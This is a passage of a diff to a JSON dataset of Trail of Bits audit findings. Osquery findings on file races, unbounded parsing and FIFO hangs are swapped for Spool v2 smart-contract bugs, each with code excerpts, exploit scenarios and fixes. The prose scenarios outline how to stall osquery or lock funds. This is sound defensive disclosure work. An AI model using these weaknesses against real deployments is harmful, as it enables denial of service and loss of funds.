\"Owner is not root\"); } Status PlatformFile::isOwnerCurrentUser() const { if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == ::getuid()) { return Status::success(); } return Status(1, \"Owner is not current user\"); } Status PlatformFile::isExecutable() const { struct stat file_stat; if (::fstat(handle_, &file_stat) < 0) { return Status(-1, \"fstat error\"); } if ((file_stat.st_mode & S_IXUSR) == S_IXUSR) { return Status::success(); } return Status(1, \"Not executable\"); } Status PlatformFile::hasSafePermissions() const { struct stat file; if (::fstat(handle_, &file) < 0) { return Status(-1, \"fstat error\"); } // We allow user write for now, since our main threat is external // modification by other users if ((file.st_mode & S_IWOTH) == 0) { return Status::success(); } return Status(1, \"Writable\"); } Figure 6.1: The methods in PlatformFile could cause race issues. Exploit Scenario A new function is added to osquery that uses hasSafePermissions to determine whether to allow a potentially unsafe operation. An attacker creates a file that passes the hasSafePermissions check, then changes the permissions and alters the file contents before the file is further processed by the osquery agent. Recommendations Short term, refactor the operations of the relevant PlatformFile class methods to minimize the race window. For example, the only place hasSafePermissions is currently used is in the safePermissions function, in which it is preceded by a check that the file is owned by root or the current user, which eliminates the possibility of an adversary using the race condition; therefore, refactoring may not be necessary in this method. Add comments to these methods describing possible adverse effects. Long term, refactor the interface of PlatformFile to contain the potential race issues within the class. For example, move the safePermissions function into the PlatformFile class so that hasSafePermissions is not exposed outside of the class.", + "title": "28. 
Reward emission can be extended for a removed reward token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Smart vault owners can extend the reward emission for a removed token, which may cause tokens to be stuck in the RewardManager contract. The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration: function _removeReward(address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for (uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount - 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break; } } } Figure 28.1: The _removeReward function in spool-v2-core/RewardManager.sol The extendRewardEmission function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is not zero to make sure that the token was already added to the smart vault: function extendRewardEmission(address smartVault, IERC20 token, uint256 reward, uint32 rewardsDuration) external onlyAdminOrVaultAdmin(smartVault, msg.sender) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardConfiguration[smartVault][token].tokenAdded == 0) { revert InvalidRewardToken(address(token)); } rewardConfiguration[smartVault][token].rewardsDuration = rewardsDuration; _extendRewardEmission(smartVault, token, reward); } Figure 28.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol After removing a reward token from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which allows the smart vault owner to extend the reward emission for the removed token. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. After some time, she forgets that she removed token A from her vault. She calls extendRewardEmission with 1,000 token A as the reward. The amount of token A is transferred from Alice to the RewardManager contract, but it is not distributed to the users because it is not present in the list of reward tokens added for smart vault S. The 1,000 tokens are stuck in the RewardManager contract. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "7. No limit on the amount of data that parsePlist can parse ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "To support several macOS-specific tables, osquery contains a function called osquery::parsePlist, which reads and parses property list (.plist) files by using the Apple Foundation framework class NSPropertyListSerialization. The parsePlist function is used by tables such as browser_plugins and xprotect_reports to read user-accessible files. 
The function does not have any limit on the amount of data that it will parse. id ns_path = [NSString stringWithUTF8String:path.string().c_str()]; id stream = [NSInputStream inputStreamWithFileAtPath:ns_path]; if (stream == nil) { return Status(1, \"Unable to read plist: \" + path.string()); } // Read file content into a data object, containing potential plist data. NSError* error = nil; [stream open]; id plist_data = [NSPropertyListSerialization propertyListWithStream:stream options:0 format:NULL error:&error]; Figure 7.1: The parsePlist implementation does not have a limit on the amount of data that it can deserialize. auto info_path = path + \"/Contents/Info.plist\"; // Ensure that what we're processing is actually a plug-in. if (!pathExists(info_path)) { return; } if (osquery::parsePlist(info_path, tree).ok()) { // Plugin did not include an Info.plist, or it was invalid for (const auto& it : kBrowserPluginKeys) { r[it.second] = tree.get(it.first, \"\"); // Convert bool-types to an integer. jsonBoolAsInt(r[it.second]); } } Figure 7.2: browser_plugins uses parsePlist on user-controlled files. Exploit Scenario An attacker crafts a large, valid .plist file and stores it in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist on a macOS system running the osquery daemon. When osquery executes a query using the browser_plugins table, it reads and parses the complete file, causing high resource consumption. Recommendations Short term, modify the browser_plugins and xprotect_reports tables to enforce a maximum file size (e.g., by combining readFile and parsePlistContent). Long term, to prevent this issue in future tables, consider removing the parsePlist function or rewriting it as a helper function around a safer implementation.", + "title": "29. A reward token cannot be added once it is removed from a smart vault ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Smart vault owners cannot add reward tokens again after they have been removed once from the smart vault, making owners incapable of providing incentives to users. 
The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration: function _removeReward(address smartVault, IERC20 token) private { uint256 _rewardTokensCount = rewardTokensCount[smartVault]; for (uint256 i; i < _rewardTokensCount; ++i) { if (rewardTokens[smartVault][i] == token) { rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1]; delete rewardTokens[smartVault][_rewardTokensCount - 1]; rewardTokensCount[smartVault]--; emit RewardRemoved(smartVault, token); break; } } } Figure 29.1: The _removeReward function in spool-v2-core/RewardManager.sol The addToken function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is zero to make sure that the token was not already added to the smart vault: function addToken(address smartVault, IERC20 token, uint32 rewardsDuration, uint256 reward) external onlyAdminOrVaultAdmin(smartVault, msg.sender) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration[smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token)); if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token)); if (rewardsDuration == 0) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if (reward > 0) { _extendRewardEmission(smartVault, token, reward); } } Figure 29.2: The addToken function in spool-v2-core/RewardManager.sol After a reward token is removed from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which prevents the smart vault owner from adding the token again for reward distribution as an incentive to the users of the smart vault. Exploit Scenario Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. Noticing the success of her earlier reward incentive program, she wants to add reward token A to her smart vault again, but her transaction to add the reward token reverts, leaving her with no choice but to distribute another token. Recommendations Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault. Long term, add test cases to check for expected user interactions to catch bugs such as this.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: Low" ] }, { - "title": "8. The parsePlist function can hang on reading certain files ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The osquery codebase contains a function called osquery::parsePlist, which reads and parses .plist files. This function opens the target file directly by using the inputStreamWithFileAtPath method from NSInputStream, as shown in figure 7.1 in the previous finding, and passes the resulting input stream to NSPropertyListSerialization for direct consumption. However, parsePlist can hang on reading certain files. For example, if the file to be read is a FIFO, the function blocks the osquery thread until another program or thread opens the FIFO to write to it. 
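(Tying findings 28 and 29 together: both stem from _removeReward leaving rewardConfiguration[smartVault][token] populated. A minimal sketch of the shared fix, assuming nothing else depends on the stale configuration; storage layout abbreviates the real RewardManager, and the delete line is the only addition to the excerpt in figures 28.1 and 29.1.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Hedged sketch of the fix suggested for findings 28 and 29. The real code
// stores IERC20 references; plain addresses are used here for brevity.
contract RewardManagerSketch {
    struct RewardConfiguration { uint32 rewardsDuration; uint256 tokenAdded; }

    mapping(address => uint256) public rewardTokensCount;
    mapping(address => mapping(uint256 => address)) public rewardTokens;
    mapping(address => mapping(address => RewardConfiguration)) public rewardConfiguration;

    event RewardRemoved(address indexed smartVault, address indexed token);

    function _removeReward(address smartVault, address token) internal {
        uint256 _rewardTokensCount = rewardTokensCount[smartVault];
        for (uint256 i; i < _rewardTokensCount; ++i) {
            if (rewardTokens[smartVault][i] == token) {
                rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1];
                delete rewardTokens[smartVault][_rewardTokensCount - 1];
                rewardTokensCount[smartVault]--;
                // Added: clear the configuration so tokenAdded returns to zero,
                // letting addToken succeed again and extendRewardEmission revert.
                delete rewardConfiguration[smartVault][token];
                emit RewardRemoved(smartVault, token);
                break;
            }
        }
    }
}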
Exploit Scenario An attacker creates a FIFO file on a macOS device in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist or ~/Library/Logs/DiagnosticReports/XProtect-foo using the mkfifo command. The osquery agent attempts to open and read the file when building a response for queries on the browser_plugins and xprotect_reports tables, but parsePlist blocks the osquery thread indefinitely, leaving osquery unable to respond to the query request. Recommendations Short term, implement a check in parsePlist to verify that the .plist file to be read is not a special file. Long term, introduce a timeout on file operations so that a block does not stall the osquery thread. Also consider replacing parsePlist with the parsePlistContent function and standardizing all file reads on a single code path to prevent similar issues going forward. 9. The parseJSON function can hang on reading certain files on Linux and macOS Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-ATL-9 Target: osquery/filesystem/filesystem.cpp", + "title": "30. Missing whenNotPaused modifier ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The documentation specifies which functionalities should not work when the system is paused, including the claiming of rewards; however, the claim function does not have the whenNotPaused modifier. As a result, users can claim their rewards even when the system is paused. If the system is paused: - users can't claim vault incentives - [...] Figure 30.1: A snippet of the provided Spool documentation function claim(ClaimRequest[] calldata data) public { Figure 30.2: The claim function header in spool-v2-core/RewardPool.sol#L47 Exploit Scenario Alice, who has the ROLE_PAUSER role in the system, pauses the protocol after she sees a possible vulnerability in the claim function. The Spool team believes there are no possible funds moving from the system; however, users can still claim their rewards. Recommendations Short term, add the whenNotPaused modifier to the claim function. Long term, improve the system's unit and integration tests by adding a test to verify that the expected functionalities do not work when the system is in a paused state.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "10. No limit on the amount of data read or expanded from the Safari extensions table ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The safari_extensions table allows the agent to query installed Safari extensions on a certain user profile. Said extensions consist of extensible archive format (XAR) compressed archives with the .safariextz file extension, which are stored in the ~/Library/Safari/Extensions folder. The osquery program does not have a limit on the amount of data that can be processed when reading and inflating the Safari extension contents; a large amount of data may cause a denial of service. 
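(For finding 30 above, the short-term fix is a one-line change; a self-contained sketch follows. The ClaimRequest layout and pause wiring are simplified stand-ins for the real RewardPool, not Spool's actual code.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Hedged sketch for finding 30: claim gated by whenNotPaused.
contract RewardPoolSketch {
    struct ClaimRequest { address smartVault; address token; uint256 cycle; }

    bool public paused;

    modifier whenNotPaused() {
        require(!paused, "system paused");
        _;
    }

    function claim(ClaimRequest[] calldata data) public whenNotPaused {
        for (uint256 i; i < data.length; ++i) {
            // reward verification and payout logic elided
        }
    }
}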
xar_t xar = xar_open(path.c_str(), READ); if (xar == nullptr) { TLOG << \"Cannot open extension archive: \" << path; return; } xar_iter_t iter = xar_iter_new(); xar_file_t xfile = xar_file_first(xar, iter); size_t max_files = 500; for (size_t index = 0; index < max_files; ++index) { if (xfile == nullptr) { break; } char* xfile_path = xar_get_path(xfile); if (xfile_path == nullptr) { break; } // Clean up the allocated content ASAP. std::string entry_path(xfile_path); free(xfile_path); if (entry_path.find(\"Info.plist\") != std::string::npos) { if (xar_verify(xar, xfile) != XAR_STREAM_OK) { TLOG << \"Extension info extraction failed verification: \" << path; } size_t size = 0; char* buffer = nullptr; if (xar_extract_tobuffersz(xar, xfile, &buffer, &size) != 0 || size == 0) { break; } std::string content(buffer, size); free(buffer); pt::ptree tree; if (parsePlistContent(content, tree).ok()) { for (const auto& it : kSafariExtensionKeys) { r[it.second] = tree.get(it.first, \"\"); } } break; } xfile = xar_file_next(iter); } Figure 10.1: genSafariExtension extracts the full Info.plist to memory. Exploit Scenario An attacker crafts a valid extension containing a large Info.plist file and stores it in ~/Library/Safari/Extensions/foo.safariextz. When the osquery agent attempts to respond to a query on the safari_extensions table, it opens the archive and expands the full Info.plist file in memory, causing high resource consumption. Recommendations Short term, enforce a limit on the amount of information that can be extracted from an XAR archive. Long term, add guidelines to the development documentation on handling untrusted input data. For instance, advise developers to limit the amount of data that may be ingested, processed, or read from untrusted sources such as user-writable files. Enforce said guidelines by performing code reviews on new contributions.", + "title": "31. Users who deposit and then withdraw before doHardWork lose their tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Users who deposit and then withdraw assets before doHardWork is called will receive zero tokens from their withdrawal operations. When a user deposits assets, the depositAssets function mints an NFT with some metadata to the user who can later redeem it for the underlying SVT tokens. function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender) returns (uint256[] memory, uint256) { [...] // mint deposit NFT DepositMetadata memory metadata = DepositMetadata(bag.assets, block.timestamp, bag2.flushIndex); uint256 depositId = ISmartVault(bag.smartVault).mintDepositNFT(bag.receiver, metadata); [...] } Figure 31.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379-L439 Users call the claimSmartVaultTokens function in the SmartVaultManager contract to claim SVT tokens. It is important to note that this function calls the _syncSmartVault function with false as the last argument, which means that it will not revert if the current flush index and the flush index to sync are the same. Then, claimSmartVaultTokens delegates the work to the corresponding function in the DepositManager contract. 
function claimSmartVaultTokens(address smartVault, uint256[] calldata nftIds, uint256[] calldata nftAmounts) public whenNotPaused returns (uint256) { _onlyRegisteredSmartVault(smartVault); address[] memory tokens = _assetGroupRegistry.listAssetGroup(_smartVaultAssetGroups[smartVault]); _syncSmartVault(smartVault, _smartVaultStrategies[smartVault], tokens, false); return _depositManager.claimSmartVaultTokens(smartVault, nftIds, nftAmounts, tokens, msg.sender); } Figure 31.2: A snippet of the claimSmartVaultTokens function in spool-v2-core/SmartVaultManager.sol#L238-L247 Later, the claimSmartVaultTokens function in DepositManager (figure 31.3) computes the SVT tokens that users will receive by calling the getClaimedVaultTokensPreview function and passing the bag.mintedSVTs value for the flush corresponding to the burned NFT. function claimSmartVaultTokens( address smartVault, uint256[] calldata nftIds, uint256[] calldata nftAmounts, address[] calldata tokens, address executor ) external returns (uint256) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender); [...] ClaimTokensLocalBag memory bag; ISmartVault vault = ISmartVault(smartVault); bag.metadata = vault.burnNFTs(executor, nftIds, nftAmounts); for (uint256 i; i < nftIds.length; ++i) { if (nftIds[i] > MAXIMAL_DEPOSIT_ID) { revert InvalidDepositNftId(nftIds[i]); } // we can pass empty strategy array and empty DHW index array, // because vault should already be synced and mintedVaultShares values available bag.data = abi.decode(bag.metadata[i], (DepositMetadata)); bag.mintedSVTs = _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares; claimedVaultTokens += getClaimedVaultTokensPreview(smartVault, bag.data, nftAmounts[i], bag.mintedSVTs, tokens); } Figure 31.3: A snippet of the claimSmartVaultTokens in spool-v2-core/DepositManager.sol#L135-L184 Then, getClaimedVaultTokensPreview calculates the SVT tokens proportional to the amount deposited. function getClaimedVaultTokensPreview( address smartVaultAddress, DepositMetadata memory data, uint256 nftShares, uint256 mintedSVTs, address[] calldata tokens ) public view returns (uint256) { [...] for (uint256 i; i < data.assets.length; ++i) { depositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], data.assets[i], exchangeRates[i]); totalDepositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], totalDepositedAssets[i], exchangeRates[i]); } uint256 claimedVaultTokens = mintedSVTs * depositedUsd / totalDepositedUsd; return claimedVaultTokens * nftShares / NFT_MINTED_SHARES; } Figure 31.4: A snippet of the getClaimedVaultTokensPreview function in spool-v2-core/DepositManager.sol#L546-L572 However, the value of _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares, shown in figure 31.3, will always be 0: the value is updated in the syncDeposit function, but because the current flush cycle is not finished yet, syncDeposit cannot be called through syncSmartVault. The same problem appears in the redeem, redeemFast, and claimWithdrawal functions. Exploit Scenario Bob deposits assets into a smart vault, but he notices that he deposited in the wrong smart vault. He calls redeem and claimWithdrawal, expecting to receive back his tokens, but he receives zero tokens. The tokens are locked in the smart contracts. Recommendations Short term, do not allow users to withdraw tokens when the corresponding flush has not yet happened. 
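(One way to implement this short-term recommendation is to refuse claims against a flush that has not been synced. A hedged sketch, assuming, as the finding argues, that a zero mintedVaultShares value identifies exactly the unsynced flush cycles; the storage layout and error name are stand-ins for DepositManager.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Hedged sketch for finding 31.
contract DepositManagerSketch {
    struct FlushShares { uint128 flushSvtSupply; uint128 mintedVaultShares; }

    mapping(address => mapping(uint256 => FlushShares)) internal _flushShares;

    error FlushNotSyncedYet(address smartVault, uint256 flushIndex);

    function _mintedSVTsChecked(address smartVault, uint256 flushIndex)
        internal
        view
        returns (uint256 mintedSVTs)
    {
        mintedSVTs = _flushShares[smartVault][flushIndex].mintedVaultShares;
        // Zero means the flush cycle has not been synced: claiming now would
        // burn the deposit NFT for zero SVTs, so revert instead.
        if (mintedSVTs == 0) {
            revert FlushNotSyncedYet(smartVault, flushIndex);
        }
    }
}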
Long term, document and test the expected effects when calling functions in all of the possible orders, and add adequate constraints to avoid unexpected behavior.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Low" ] }, { - "title": "11. Extended attributes table may read uninitialized or out-of-bounds memory ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The extended_attributes table calls the listxattr function twice: first to query the extended attribute list size and then to actually retrieve the list of attribute names. Additionally, the return values from the function calls are not checked for errors. This leads to a race condition in the parseExtendedAttributeList osquery function, in which the content buffer is left uninitialized if the target file is deleted in the time between the two listxattr calls. As a result, std::string will consume uninitialized and unbounded memory, potentially leading to out-of-bounds memory reads. std::vector<std::string> attributes; ssize_t value = listxattr(path.c_str(), nullptr, (size_t)0, 0); char* content = (char*)malloc(value); if (content == nullptr) { return attributes; } ssize_t ret = listxattr(path.c_str(), content, value, 0); if (ret == 0) { free(content); return attributes; } char* stable = content; do { attributes.push_back(std::string(content)); content += attributes.back().size() + 1; } while (content - stable < value); free(stable); return attributes; Figure 11.1: parseExtendedAttributeList calls listxattr twice. Exploit Scenario An attacker creates and runs a program to race osquery while it is fetching extended attributes from the file system. The attacker is successful and causes the osquery agent to crash with a segmentation fault. Recommendations Short term, rewrite the affected code to check the return values for errors. Replace listxattr with flistxattr, which operates on opened file descriptors, allowing it to continue to query extended attributes even if the file is removed (unlink-ed) from the file system. Long term, establish and enforce best practices for osquery contributions by leveraging automated tooling and code reviews to prevent similar issues from reoccurring. For example, use file descriptors instead of file paths when you need to perform more than one operation on a file to ensure that the file is not deleted or replaced mid-operation. Consider using static analysis tools such as CodeQL to look for other instances of similar issues in the code and to detect new instances of the problem on new contributions.", + "title": "32. Lack of events emitted for state-changing functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Multiple critical operations do not emit events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions. This may prevent malfunctioning contracts or attacks from being detected. 
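(As a concrete illustration of the pattern this finding calls for, applied to one of the operations in the list that follows below; the function signature is an assumption, not the actual Spool API.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Hedged sketch for finding 32: emit an event on every state-changing entry point.
contract StrategyRegistrySketch {
    mapping(address => bool) public registeredStrategies;

    event StrategyRegistered(address indexed strategy, address indexed caller);

    function registerStrategy(address strategy) external {
        registeredStrategies[strategy] = true;
        emit StrategyRegistered(strategy, msg.sender); // added for monitoring
    }
}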
The following operations should trigger events: SpoolAccessControl.grantSmartVaultOwnership ActionManager.setActions SmartVaultManager.registerSmartVault SmartVaultManager.removeStrategy SmartVaultManager.syncSmartVault SmartVaultManager.reallocate StrategyRegistry.registerStrategy StrategyRegistry.removeStrategy StrategyRegistry.doHardWork StrategyRegistry.setEcosystemFee StrategyRegistry.setEcosystemFeeReceiver StrategyRegistry.setTreasuryFee StrategyRegistry.setTreasuryFeeReceiver Strategy.doHardWork RewardManager.addToken RewardManager.extendRewardEmission Exploit Scenario The Spool system experiences a security incident, but the Spool team has trouble reconstructing the sequence of events causing the incident because of missing log information. Recommendations Short term, add events for all operations that may contribute to a higher level of monitoring and alerting. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "12. The readFile function can hang on reading a file ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The readFile function is used to provide a standardized way to read files. It uses the read_max variable to prevent the function from reading excessive amounts of data. It also selects one of two modes, blocking or non-blocking, depending on the file properties. When using the blocking approach, it reads block_size-sized chunks of the file, with a minimum of 4,096 bytes, and returns the chunks to the caller. However, the call to read can block the osquery thread when reading certain files. if (handle.blocking_io) { // Reset block size to a sane minimum. block_size = (block_size < 4096) ? 4096 : block_size; ssize_t part_bytes = 0; bool overflow = false; do { std::string part(block_size, '\\0'); part_bytes = handle.fd->read(&part[0], block_size); if (part_bytes > 0) { total_bytes += static_cast<size_t>(part_bytes); if (total_bytes >= read_max) { return Status::failure(\"File exceeds read limits\"); } if (file_size > 0 && total_bytes > file_size) { overflow = true; part_bytes -= (total_bytes - file_size); } predicate(part, part_bytes); } } while (part_bytes > 0 && !overflow); } else { Figure 12.1: The blocking_io flow can stall. Exploit Scenario An attacker creates a symlink to /dev/tty in a path known to be read by the osquery agent. When the osquery agent attempts to read the file, it stalls. Recommendations Short term, ensure that the file operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on file operations so that a block does not stall the osquery thread.", + "title": "33. Removal of a strategy could result in loss of funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "A Spool admin can remove a strategy from the system, which will be replaced by a ghost strategy in all smart vaults that use it; however, if a strategy is removed when the system is in specific states, funds to be deposited or withdrawn in the next do hard work cycle will be lost. 
If the following sequence of events occurs, the asset deposited will be lost from the removed strategy: 1. A user deposits assets into a smart vault. 2. The flush function is called. The StrategyRegistry._assetsDeposited[strategy][xxx][yyy] storage variable now has assets to send to the given strategy in the next do hard work cycle. 3. The strategy is removed. 4. doHardWork is called, but the assets for the removed strategy are locked in the master wallet because the function can be called only for valid strategies. If the following sequence of events occurs, the assets withdrawn from a removed strategy will be lost: 1. doHardWork is called. 2. The strategy is removed before a smart vault sync is done. Exploit Scenario Multiple smart vaults use strategy A. Users deposited a total of $1 million, and $300,000 should go to strategy A. Strategy A is removed due to an issue in the third-party protocol. All of the $300,000 is locked in the master wallet. Recommendations Short term, modify the associated code to properly handle deposited and withdrawn funds when strategies are removed. Long term, improve the system's unit and integration tests: consider all of the possible transaction sequences in the system's state and test them to ensure their correct behavior.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "13. The POSIX PlatformFile constructor may block the osquery thread ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The POSIX implementation of PlatformFile's constructor uses the open syscall to obtain a handle to the file. If the file to be opened is a FIFO, the call to open blocks the osquery thread unless the O_NONBLOCK flag is used. There are several places in the codebase in which the constructor is called without the PF_NONBLOCK flag set; all of these calls may stall on opening a FIFO. PlatformFile::PlatformFile(const fs::path& path, int mode, int perms) : fname_(path) { ... if ((mode & PF_NONBLOCK) == PF_NONBLOCK) { oflag |= O_NONBLOCK; is_nonblock_ = true; } if ((mode & PF_APPEND) == PF_APPEND) { oflag |= O_APPEND; } if (perms == -1 && may_create) { perms = 0666; } boost::system::error_code ec; if (check_existence && (!fs::exists(fname_, ec) || ec.value() != errc::success)) { handle_ = kInvalidHandle; } else { handle_ = ::open(fname_.c_str(), oflag, perms); } } Figure 13.1: The POSIX PlatformFile constructor ./filesystem/file_compression.cpp:26: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:32: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:102: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:108: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:177: PlatformFile pFile(f, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:242: PlatformFile fd(path, PF_OPEN_EXISTING | PF_WRITE); ./filesystem/filesystem.cpp:258: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:531: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./carver/carver.cpp:230: PlatformFile src(srcPath, PF_OPEN_EXISTING | PF_READ); Figure 13.2: Uses of PlatformFile without PF_NONBLOCK Exploit Scenario An attacker creates a FIFO file that is opened by one of the functions above, stalling the osquery agent. 
Recommendations Short term, investigate the uses of PlatformFile to identify possible blocks. Long term, use a static analysis tool such as CodeQL to scan the code for instances in which uses of the open syscall block the osquery thread. 14. No limit on the amount of data the Carver::blockwiseCopy method can write Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-ATL-14 Target: osquery/carver/carver.cpp", + "title": "34. ExponentialAllocationProvider reverts on strategies without risk scores ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "The ExponentialAllocationProvider.calculateAllocation function can revert due to a division-by-zero error when a strategy's risk score has not been set by the risk provider. The risk variable in calculateAllocation represents the risk score set by the risk provider for the given strategy, represented by the index i. Ghost strategies can be passed to the function. If a ghost strategy's risk score has not been set (which is likely, as there would be no reason to set one), the function will revert with a division-by-zero error. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns (uint256[] memory) { if (data.apys.length != data.riskScores.length) { revert ApysOrRiskScoresLengthMismatch(data.apys.length, data.riskScores.length); } [...] for (uint8 i; i < data.apys.length; ++i) { [...] int256 risk = fromUint(data.riskScores[i]); results[i] = uint256(div(apy, risk)); resultSum += results[i]; } Figure 34.1: A snippet of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L309-L340 Exploit Scenario A strategy is removed from a smart vault that uses the ExponentialAllocationProvider contract. Bob, who has the ROLE_ALLOCATOR role, calls reallocate; however, it reverts, and the smart vault is impossible to reallocate. Recommendations Short term, modify the calculateAllocation function so that it properly handles strategies with uninitialized risk scores. Long term, improve the unit and integration tests for the allocators. Refactor the codebase so that ghost strategies are not passed to the calculateAllocation function.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "15. The carves table truncates large file sizes to 32 bits ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", - "body": "The enumerateCarves function uses rapidjson::Value::GetInt() to retrieve a size value from a JSON string. The GetInt return type is int, so it cannot represent sizes exceeding 32 bits; as a result, the size of larger files will be truncated. 
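(For finding 34 above, a hedged sketch of one way to handle uninitialized risk scores: treat them as "allocate nothing" instead of dividing by them. The fixed-point helpers of the real allocator are replaced with plain integer math, so this is an illustration of the guard, not the actual formula.)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

// Hedged sketch for finding 34.
contract AllocationSketch {
    function calculateAllocation(uint256[] calldata apys, uint256[] calldata riskScores)
        external
        pure
        returns (uint256[] memory results)
    {
        require(apys.length == riskScores.length, "length mismatch");
        results = new uint256[](apys.length);
        for (uint256 i; i < apys.length; ++i) {
            if (riskScores[i] == 0) {
                continue; // ghost or unscored strategy: skip instead of dividing by zero
            }
            results[i] = apys[i] / riskScores[i];
        }
    }
}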
